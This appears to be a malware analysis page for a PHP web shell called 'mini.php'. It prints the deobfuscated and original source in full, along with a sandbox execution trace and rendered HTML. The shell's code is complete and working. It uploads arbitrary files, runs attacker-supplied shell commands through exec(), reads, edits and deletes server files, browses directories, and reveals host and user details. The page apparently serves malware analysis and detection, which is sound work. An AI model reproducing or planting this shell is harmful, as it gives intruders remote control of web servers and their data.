PHP Malware Analysis

mini.php

md5: f4eab243196403cb5ca480f14049d589

Jump to:

Screenshot


Attributes

Emails

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<html>
	<head>
		<title>Mini Php Shell jos_ali_joe</title>
		<style type="text/css">
			a  {
				text-decoration: none;
				display: block;
			}
 
			a img  {
				border: 0;
			}
 
			#view tr:hover  {
				background-color: #FFFFFF;
			}
 
			input {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			input:hover  {
				background-color: #000000;
			}
 
			textarea {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			body  {
				font-family: Courier New, Courier, Fixed;
				font-size: 10px;
				color: #FFFFFF;
			}
 
			table#bordered  {
				border: 1px solid #FFFFFF;
				background-color: #000;
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				color: #FFFFFF;
			}
 
			form#post  {}
 
			#post .buttons  {
				background-color: transparent;
				font-family: Arial;
				font-size: 15px;
				color: #777;
				border: 0;
			}
 
			#cell  {
				border-bottom: 1px #FFFFFF dotted;
			}
		</style>
	</head>
 
	<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
	<h1 style='color: #fff'><u><a href="<?php 
print $_SERVER['PHP_SELF'];
?>" style="color: #fff">
	Mini Php Shell jos_ali_joe V27.9</a></u></h1>
		<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
		color: #fff">http://explorecrew.org/</a></u><br> # Contact : [email protected] </u></p><br>
 
		<table border=0 id="bordered">
 
<?php 
function getperms($f)
{
    $mode = fileperms($f);
    $perm = '';
    $perm .= $mode & 0400 ? 'r' : '-';
    $perm .= $mode & 0200 ? 'w' : '-';
    $perm .= $mode & 0100 ? 'x' : '-';
    $perm .= $mode & 040 ? 'r' : '-';
    $perm .= $mode & 020 ? 'w' : '-';
    $perm .= $mode & 010 ? 'x' : '-';
    $perm .= $mode & 04 ? 'r' : '-';
    $perm .= $mode & 02 ? 'w' : '-';
    $perm .= $mode & 01 ? 'x' : '-';
    return $perm;
}
print "<tr><td>~ host </td><td><b>" . $_SERVER['SERVER_NAME'] . "</b></td></tr>";
print "<tr><td>~ server </td><td><b>" . $_SERVER['SERVER_SOFTWARE'] . "</b></td></tr>";
if (is_callable("php_uname")) {
    print "<tr><td>~ os </td><td><b>" . php_uname() . "</b></td></tr>";
}
if (is_callable("posix_getuid") and is_callable("posix_getgid")) {
    $uid = posix_getuid();
    $uname = posix_getpwuid($uid);
    $uname = $uname['name'];
    $gid = posix_getgid();
    $gname = posix_getgrgid($gid);
    $gname = $gname['name'];
    print "<tr><td>~ uid </td><td><b>{$uid} ({$uname})</b></td></tr>";
    print "<tr><td>~ gid </td><td><b>{$gid} ({$gname})</b></td></tr>";
}
print "</table><br><br>";
if (!isset($_POST['file'])) {
    ?>
 
<table border=0 style="font-size: 12px">
 
<form enctype="multipart/form-data" action="<?php 
    print $_SERVER['REQUEST_URI'];
    ?>" method="POST">
	<input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
	<input type="hidden" name="do_upload" value="true">
		<tr><td>&gt; Upload Data</td></tr>
		<tr><td><input type="file" name="userfile"/></td></tr>
		<tr><td><input type="submit" value="> send"/></td></tr>
</form>
 
<tr><td height="20px"></td></tr>
 
<form action="<?php 
    print $_SERVER['REQUEST_URI'];
    ?>" method="POST">
		<tr><td>> Comand</td></tr>
		<tr><td><input type="text" name="cmd"></td></tr>
		<tr><td><input type="submit" value="> execute cmd"></td></tr>
</form>
</table>
 
<?php 
}
#
# Upload di file
#
if ($_POST['do_upload'] === "true") {
    if ($_POST['dir'] == "true") {
        $dir = $_POST['dirname'];
    } else {
        $dir = getcwd();
    }
    $uploadfile = $dir . "/" . basename($_FILES['userfile']['name']);
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
        print "File successfully loaded<br>\n";
        print "~ file name: <b>" . $_FILES['userfile']['name'] . "</b><br>" . "\n~ type: " . $_FILES['userfile']['type'] . "<br>\n" . "~ size: " . $_FILES['userfile']['size'] . " bytes<br>\n";
    } else {
        print "\$ Error while loading " . $_FILES['userfile']['name'] . "<br>\n";
    }
}
#
# Modifica o cancellazione di file
#
if (isset($_POST['dofile'])) {
    $ref = $_SERVER['HTTP_REFERER'];
    $fname = htmlentities($_POST['dofile']);
    $content = $_POST['content'];
    #
    # Modifica
    #
    if (isset($_POST['save'])) {
        if (!($fp = fopen($fname, "w"))) {
            die("\$ Unable to write to <b>{$fname}</b><br>\n");
        }
        fputs($fp, $content);
        fclose($fp);
        print "File <b>{$fname}</b> successfully updated<br><br>\n";
    }
    #
    # Cancellazione
    #
    if (isset($_POST['remove'])) {
        unlink($fname) or die("\$ Unable to remove <b>{$fname}</b><br>\n");
        print "<b>{$fname}</b> successfully removed<br><br>\n";
    }
}
#
# Esecuzione di un comando
#
if (isset($_POST['cmd'])) {
    $cmd = $_POST['cmd'];
    $output = array();
    exec($cmd, $output);
    print "<br><hr height=1 width=\"100%\">\n";
    print "# cmd output: <br><br><tt>";
    print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
    foreach ($output as $line) {
        print "{$line}<br>\n";
    }
    print "</div></tt>\n";
    die('');
}
#
# Visualizzazione di file
#
if (isset($_POST['fname'])) {
    print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
    $fname = htmlentities($_POST['fname']);
    $file = file($fname) or print "\$ Unable to open <b>{$fname}</b><br>\n";
    print "<form action=\"" . $_SERVER['REQUEST_URI'] . "\" method=\"POST\">\n";
    print "<input type=\"hidden\" name=\"dofile\" value=\"{$fname}\">\n";
    print "<textarea rows=20 cols=80 name=\"content\">";
    for ($i = 0; $i < count($file); $i++) {
        print htmlentities($file[$i]);
    }
    print "</textarea><br><br>\n";
    print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
    print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
    print "</form>\n";
}
#
# Visualizzazione del contenuto di una directory
#
if (isset($_POST['dirname'])) {
    $path = htmlspecialchars($_POST['dirname']);
} else {
    $path = getcwd();
}
$dp = opendir($path) or die("\$ Unable to open <b>{$path}</b><br>\n");
chdir($path);
$path = getcwd();
print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "<font color=\"white\">&gt; cwd: <b>" . getcwd() . "</b></font><br><br>\n\n";
$dir = array();
while ($file = readdir($dp)) {
    if (strcmp(".", $file)) {
        array_push($dir, "{$path}/{$file}");
    }
}
closedir($dp);
sort($dir);
?>
 
<form name="post" id="post" action="<?php 
print $_SERVER['REQUEST_URI'];
?>" method="POST">
<table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<?php 
for ($i = 0; $i < count($dir); $i++) {
    print "<tr style='font-family: Arial; font-size: 11px;'>\n";
    #
    # Directory superiore
    #
    if (basename($dir[$i]) === "..") {
        $tmp = split('/', getcwd());
        $new = "";
        for ($j = 0; $j < count($tmp) - 1; $j++) {
            $new .= $tmp[$j] . "/";
        }
        print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
        print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"{$new}\" class=\"buttons\"></td></tr>\n";
    }
    #
    # Directory
    #
    if (is_dir($dir[$i])) {
        if (basename($dir[$i]) != '..') {
            print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
            print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"" . $dir[$i] . "\" class=\"buttons\"></td>\n";
            print "<td id=\"cell\">DIR</td></tr>\n";
        }
    } else {
        if (basename($dir[$i]) != '..') {
            print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
            print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"{$dir[$i]}\" class=\"buttons\"></td>\n";
            print "<td id=\"cell\">" . getperms($dir[$i]) . "</td></tr>\n";
        }
    }
}
print "</table></div>\n";
?>
 
	   </body>
</html>

Execution traces

data/traces/f4eab243196403cb5ca480f14049d589_trace-1676242651.3256.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:57:57.223384]
1	0	1	0.000161	393512
1	3	0	0.000421	434352	{main}	1		/var/www/html/uploads/mini.php	0	0
2	4	0	0.000442	434352	is_callable	0		/var/www/html/uploads/mini.php	94	1	'php_uname'
2	4	1	0.000459	434384
2	4	R			TRUE
2	5	0	0.000473	434352	php_uname	0		/var/www/html/uploads/mini.php	95	0
2	5	1	0.000490	434464
2	5	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	6	0	0.000533	434352	is_callable	0		/var/www/html/uploads/mini.php	97	1	'posix_getuid'
2	6	1	0.000548	434384
2	6	R			TRUE
2	7	0	0.000561	434352	is_callable	0		/var/www/html/uploads/mini.php	97	1	'posix_getgid'
2	7	1	0.000583	434384
2	7	R			TRUE
2	8	0	0.000605	434352	posix_getuid	0		/var/www/html/uploads/mini.php	98	0
2	8	1	0.000624	434352
2	8	R			33
1		A						/var/www/html/uploads/mini.php	98	$uid = 33
2	9	0	0.000651	434352	posix_getpwuid	0		/var/www/html/uploads/mini.php	99	1	33
2	9	1	0.000684	435184
2	9	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/mini.php	99	$uname = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/mini.php	100	$uname = 'www-data'
2	10	0	0.000740	434392	posix_getgid	0		/var/www/html/uploads/mini.php	102	0
2	10	1	0.000752	434392
2	10	R			33
1		A						/var/www/html/uploads/mini.php	102	$gid = 33
2	11	0	0.000775	434392	posix_getgrgid	0		/var/www/html/uploads/mini.php	103	1	33
2	11	1	0.000803	435056
2	11	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/mini.php	103	$gname = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/mini.php	104	$gname = 'www-data'
2	12	0	0.000874	434432	getcwd	0		/var/www/html/uploads/mini.php	234	0
2	12	1	0.000889	434480
2	12	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/mini.php	234	$path = '/var/www/html/uploads'
2	13	0	0.000914	434480	opendir	0		/var/www/html/uploads/mini.php	236	1	'/var/www/html/uploads'
2	13	1	0.000934	434872
2	13	R			resource(4) of type (stream)
1		A						/var/www/html/uploads/mini.php	236	$dp = resource(4) of type (stream)
2	14	0	0.000962	434840	chdir	0		/var/www/html/uploads/mini.php	237	1	'/var/www/html/uploads'
2	14	1	0.000977	434928
2	14	R			TRUE
2	15	0	0.000991	434888	getcwd	0		/var/www/html/uploads/mini.php	238	0
2	15	1	0.001003	434936
2	15	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/mini.php	238	$path = '/var/www/html/uploads'
2	16	0	0.001028	434888	getcwd	0		/var/www/html/uploads/mini.php	241	0
2	16	1	0.001040	434936
2	16	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/mini.php	242	$dir = []
2	17	0	0.001065	434888	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	17	1	0.001089	434968
2	17	R			'mini.php'
1		A						/var/www/html/uploads/mini.php	244	$file = 'mini.php'
2	18	0	0.001114	434928	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'mini.php'
2	18	1	0.001127	434992
2	18	R			-63
2	19	0	0.001141	435008	array_push	0		/var/www/html/uploads/mini.php	246	2	[]	'/var/www/html/uploads/mini.php'
2	19	1	0.001156	435448
2	19	R			1
2	20	0	0.001169	435384	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	20	1	0.001183	435456
2	20	R			'..'
1		A						/var/www/html/uploads/mini.php	244	$file = '..'
2	21	0	0.001205	435376	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'..'
2	21	1	0.001218	435440
2	21	R			-1
2	22	0	0.001230	435432	array_push	0		/var/www/html/uploads/mini.php	246	2	[0 => '/var/www/html/uploads/mini.php']	'/var/www/html/uploads/..'
2	22	1	0.001245	435496
2	22	R			2
2	23	0	0.001256	435432	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	23	1	0.001270	435504
2	23	R			'.'
1		A						/var/www/html/uploads/mini.php	244	$file = '.'
2	24	0	0.001292	435432	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'.'
2	24	1	0.001314	435496
2	24	R			0
2	25	0	0.001326	435432	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	25	1	0.001339	435512
2	25	R			'prepend.php'
1		A						/var/www/html/uploads/mini.php	244	$file = 'prepend.php'
2	26	0	0.001363	435440	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'prepend.php'
2	26	1	0.001376	435504
2	26	R			-66
2	27	0	0.001388	435504	array_push	0		/var/www/html/uploads/mini.php	246	2	[0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..']	'/var/www/html/uploads/prepend.php'
2	27	1	0.001404	435568
2	27	R			3
2	28	0	0.001416	435504	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	28	1	0.001429	435576
2	28	R			'data'
1		A						/var/www/html/uploads/mini.php	244	$file = 'data'
2	29	0	0.001452	435496	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'data'
2	29	1	0.001464	435560
2	29	R			-54
2	30	0	0.001477	435552	array_push	0		/var/www/html/uploads/mini.php	246	2	[0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php']	'/var/www/html/uploads/data'
2	30	1	0.001494	435616
2	30	R			4
2	31	0	0.001506	435552	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	31	1	0.001518	435632
2	31	R			'.htaccess'
1		A						/var/www/html/uploads/mini.php	244	$file = '.htaccess'
2	32	0	0.001542	435560	strcmp	0		/var/www/html/uploads/mini.php	245	2	'.'	'.htaccess'
2	32	1	0.001554	435624
2	32	R			-8
2	33	0	0.001567	435616	array_push	0		/var/www/html/uploads/mini.php	246	2	[0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php', 3 => '/var/www/html/uploads/data']	'/var/www/html/uploads/.htaccess'
2	33	1	0.001584	435680
2	33	R			5
2	34	0	0.001596	435616	readdir	0		/var/www/html/uploads/mini.php	244	1	resource(4) of type (stream)
2	34	1	0.001610	435656
2	34	R			FALSE
1		A						/var/www/html/uploads/mini.php	244	$file = FALSE
2	35	0	0.001633	435576	closedir	0		/var/www/html/uploads/mini.php	248	1	resource(4) of type (stream)
2	35	1	0.001649	435392
2	35	R			NULL
2	36	0	0.001662	435352	sort	0		/var/www/html/uploads/mini.php	249	1	[0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php', 3 => '/var/www/html/uploads/data', 4 => '/var/www/html/uploads/.htaccess']
2	36	1	0.001682	435384
2	36	R			TRUE
1		A						/var/www/html/uploads/mini.php	256	$i = 0
2	37	0	0.001707	435352	basename	0		/var/www/html/uploads/mini.php	262	1	'/var/www/html/uploads/..'
2	37	1	0.001724	435416
2	37	R			'..'
1	3	1	0.001746	435688
1	38	0	0.001755	435720	Error->__toString	0		Unknown	0	0
2	39	0	0.001768	435800	Error->getTraceAsString	0		Unknown	0	0
2	39	1	0.001781	436056
2	39	R			'#0 {main}'
1	38	1	0.001798	436352
1	38	R			'Error: Call to undefined function split() in /var/www/html/uploads/mini.php:263\nStack trace:\n#0 {main}'
			0.001865	356992
TRACE END   [2023-02-12 20:57:57.225123]


Generated HTML code

<html><head>
		<title>Mini Php Shell jos_ali_joe</title>
		<style type="text/css">
			a  {
				text-decoration: none;
				display: block;
			}
 
			a img  {
				border: 0;
			}
 
			#view tr:hover  {
				background-color: #FFFFFF;
			}
 
			input {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			input:hover  {
				background-color: #000000;
			}
 
			textarea {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			body  {
				font-family: Courier New, Courier, Fixed;
				font-size: 10px;
				color: #FFFFFF;
			}
 
			table#bordered  {
				border: 1px solid #FFFFFF;
				background-color: #000;
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				color: #FFFFFF;
			}
 
			form#post  {}
 
			#post .buttons  {
				background-color: transparent;
				font-family: Arial;
				font-size: 15px;
				color: #777;
				border: 0;
			}
 
			#cell  {
				border-bottom: 1px #FFFFFF dotted;
			}
		</style>
	</head>
 
	<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
	<h1 style="color: #fff"><u><a href="/mini.php" style="color: #fff">
	Mini Php Shell jos_ali_joe V27.9</a></u></h1>
		<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http:="" explorecrew.org="" "="" style="display: inline;
		color: #fff">http://explorecrew.org/</a></u><br> # Contact : [email protected] </p><br>
 
		<table border="0" id="bordered">
 
<tbody><tr><td>~ host </td><td><b>localhost</b></td></tr><tr><td>~ server </td><td><b>Apache/2.4.52 (Ubuntu)</b></td></tr><tr><td>~ os </td><td><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b></td></tr><tr><td>~ uid </td><td><b>33 (www-data)</b></td></tr><tr><td>~ gid </td><td><b>33 (www-data)</b></td></tr></tbody></table><br><br> 
<table border="0" style="font-size: 12px">
 
<form enctype="multipart/form-data" action="/mini.php" method="POST"></form>
	<input type="hidden" name="MAX_FILE_SIZE" value="200000000">
	<input type="hidden" name="do_upload" value="true">
		<tbody><tr><td>&gt; Upload Data</td></tr>
		<tr><td><input type="file" name="userfile"></td></tr>
		<tr><td><input type="submit" value="> send"></td></tr>

 
<tr><td height="20px"></td></tr>
 
<form action="/mini.php" method="POST"></form>
		<tr><td>&gt; Comand</td></tr>
		<tr><td><input type="text" name="cmd"></td></tr>
		<tr><td><input type="submit" value="> execute cmd"></td></tr>

</tbody></table>
 
<div id="view"><hr height="1" width="100%">
<font color="white">&gt; cwd: <b>/var/www/html</b></font><br><br>

 
<form name="post" id="post" action="/mini.php" method="POST">
<table border="0" width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<tbody><tr style="font-family: Arial; font-size: 11px;">
</tr></tbody></table></form></div></body></html>

Original PHP code

<html>
	<head>
		<title>Mini Php Shell jos_ali_joe</title>
		<style type="text/css">
			a  {
				text-decoration: none;
				display: block;
			}
 
			a img  {
				border: 0;
			}
 
			#view tr:hover  {
				background-color: #FFFFFF;
			}
 
			input {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			input:hover  {
				background-color: #000000;
			}
 
			textarea {
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				background-color: #FFFFFF;
				color: #000000;
			}
 
			body  {
				font-family: Courier New, Courier, Fixed;
				font-size: 10px;
				color: #FFFFFF;
			}
 
			table#bordered  {
				border: 1px solid #FFFFFF;
				background-color: #000;
				font-family: Courier New, Courier, Fixed;
				font-size: 15px;
				color: #FFFFFF;
			}
 
			form#post  {}
 
			#post .buttons  {
				background-color: transparent;
				font-family: Arial;
				font-size: 15px;
				color: #777;
				border: 0;
			}
 
			#cell  {
				border-bottom: 1px #FFFFFF dotted;
			}
		</style>
	</head>
 
	<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
	<h1 style='color: #fff'><u><a href="<?php print $_SERVER['PHP_SELF']; ?>" style="color: #fff">
	Mini Php Shell jos_ali_joe V27.9</a></u></h1>
		<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
		color: #fff">http://explorecrew.org/</a></u><br> # Contact : [email protected] </u></p><br>
 
		<table border=0 id="bordered">
 
<?php
function getperms($f)  {
	$mode=fileperms($f);
 
	$perm='';
	$perm .= ($mode & 00400) ? 'r' : '-';
	$perm .= ($mode & 00200) ? 'w' : '-';
	$perm .= ($mode & 00100) ? 'x' : '-';
	$perm .= ($mode & 00040) ? 'r' : '-';
	$perm .= ($mode & 00020) ? 'w' : '-';
	$perm .= ($mode & 00010) ? 'x' : '-';
	$perm .= ($mode & 00004) ? 'r' : '-';
	$perm .= ($mode & 00002) ? 'w' : '-';
	$perm .= ($mode & 00001) ? 'x' : '-';
 
	return $perm;
}
 
print "<tr><td>~ host </td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>~ server </td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
	print "<tr><td>~ os </td><td><b>".php_uname()."</b></td></tr>";
 
if (is_callable("posix_getuid") and is_callable("posix_getgid"))  {
	$uid=posix_getuid();
	$uname=posix_getpwuid($uid);
	$uname=$uname['name'];
 
	$gid=posix_getgid();
	$gname=posix_getgrgid($gid);
	$gname=$gname['name'];
 
	print "<tr><td>~ uid </td><td><b>$uid ($uname)</b></td></tr>";
	print "<tr><td>~ gid </td><td><b>$gid ($gname)</b></td></tr>";
}
 
print "</table><br><br>";
 
if (!isset($_POST['file']))  {
?>
 
<table border=0 style="font-size: 12px">
 
<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
	<input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
	<input type="hidden" name="do_upload" value="true">
		<tr><td>&gt; Upload Data</td></tr>
		<tr><td><input type="file" name="userfile"/></td></tr>
		<tr><td><input type="submit" value="> send"/></td></tr>
</form>
 
<tr><td height="20px"></td></tr>
 
<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
		<tr><td>> Comand</td></tr>
		<tr><td><input type="text" name="cmd"></td></tr>
		<tr><td><input type="submit" value="> execute cmd"></td></tr>
</form>
</table>
 
<?php
}
 
#
# Upload di file
#
if ($_POST['do_upload']==="true")  {
	if ($_POST['dir']=="true")
		$dir=$_POST['dirname'];
	else
		$dir=getcwd();
 
	$uploadfile=$dir."/".basename($_FILES['userfile']['name']);
 
	if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile))  {
		print "File successfully loaded<br>\n";
		print "~ file name: <b>".$_FILES['userfile']['name']."</b><br>".
			"\n~ type: ".$_FILES['userfile']['type']."<br>\n".
			"~ size: ".$_FILES['userfile']['size']." bytes<br>\n";
	}
 
	else print "$ Error while loading ".$_FILES['userfile']['name']."<br>\n";
}
 
#
# Modifica o cancellazione di file
#
if (isset($_POST['dofile']))  {
	$ref=$_SERVER['HTTP_REFERER'];
	$fname=htmlentities($_POST['dofile']);
	$content=$_POST['content'];
 
	#
	# Modifica
	#
	if (isset($_POST['save']))  {
		if (!($fp=fopen($fname,"w")))
			die ("$ Unable to write to <b>$fname</b><br>\n");
 
		fputs ($fp,$content);
		fclose($fp);
 
		print ("File <b>$fname</b> successfully updated<br><br>\n");
	}
 
	#
	# Cancellazione
	#
	if (isset($_POST['remove']))  {
		unlink ($fname) or die ("$ Unable to remove <b>$fname</b><br>\n");
		print "<b>$fname</b> successfully removed<br><br>\n";
	}
}
 
#
# Esecuzione di un comando
#
if (isset($_POST['cmd']))  {
	$cmd=$_POST['cmd'];
	$output=array();
	exec ($cmd,$output);
 
	print "<br><hr height=1 width=\"100%\">\n";
	print "# cmd output: <br><br><tt>";
	print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
 
	foreach ($output as $line)
		print "$line<br>\n";
	print "</div></tt>\n";
	die('');
}
 
#
# Visualizzazione di file
# 
if (isset($_POST['fname']))  {
	print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
 
	$fname=htmlentities($_POST['fname']);
	$file=file($fname) or print "$ Unable to open <b>$fname</b><br>\n";
 
	print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
	print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
	print "<textarea rows=20 cols=80 name=\"content\">";
 
	for ($i=0; $i<count($file); $i++)
		print htmlentities($file[$i]);
 
	print "</textarea><br><br>\n";
	print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
	print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
	print "</form>\n";
}
 
#
# Visualizzazione del contenuto di una directory
# 
if (isset($_POST['dirname']))
	$path=htmlspecialchars($_POST['dirname']);
else
	$path=getcwd();
 
$dp=opendir($path) or die("$ Unable to open <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();
 
print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "<font color=\"white\">&gt; cwd: <b>".getcwd()."</b></font><br><br>\n\n";
$dir=array();
 
while ($file=readdir($dp))
	if (strcmp(".",$file))
		array_push($dir,"$path/$file");
 
closedir($dp);
sort($dir);
 
?>
 
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<?php
for ($i=0; $i<count($dir); $i++)  {
	print "<tr style='font-family: Arial; font-size: 11px;'>\n";
 
	#
	# Directory superiore
	#
	if (basename($dir[$i])==="..")  {
		$tmp=split('/',getcwd());
		$new="";
 
		for ($j=0; $j<count($tmp)-1; $j++)
			$new .= $tmp[$j]."/";
 
		print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
		print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
	}
 
	#
	# Directory
	#
	if (is_dir($dir[$i]))  {
		if (basename($dir[$i])!='..')  {
			print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
			print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
				"\" class=\"buttons\"></td>\n";
			print "<td id=\"cell\">DIR</td></tr>\n";
		}
	}
 
	#
	# File comune
	# 
	else  {
		if (basename($dir[$i])!='..')  {
			print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
			print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
			print "<td id=\"cell\">".getperms($dir[$i])."</td></tr>\n";
		}
	}
}
 
print "</table></div>\n";
?>
 
	   </body>
</html>